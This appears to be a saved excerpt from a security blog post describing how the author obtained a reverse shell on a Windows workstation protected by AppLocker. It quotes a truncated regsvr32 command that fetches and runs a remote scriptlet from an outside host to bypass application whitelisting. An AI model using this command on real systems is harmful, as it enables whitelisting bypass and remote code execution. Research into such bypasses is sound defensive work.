So, I have been working this out the last few days. I was trying solve a particular problem. I needed a reverse shell on workstation locked down by AppLocker executable and script rules enforced. tl;dr “regsvr32 /s /n /u /i:http://server/file.sct scrobj.
from Pocket http://subt0x10.blogspot.se/2016/04/bypass-application-whitelisting-script.html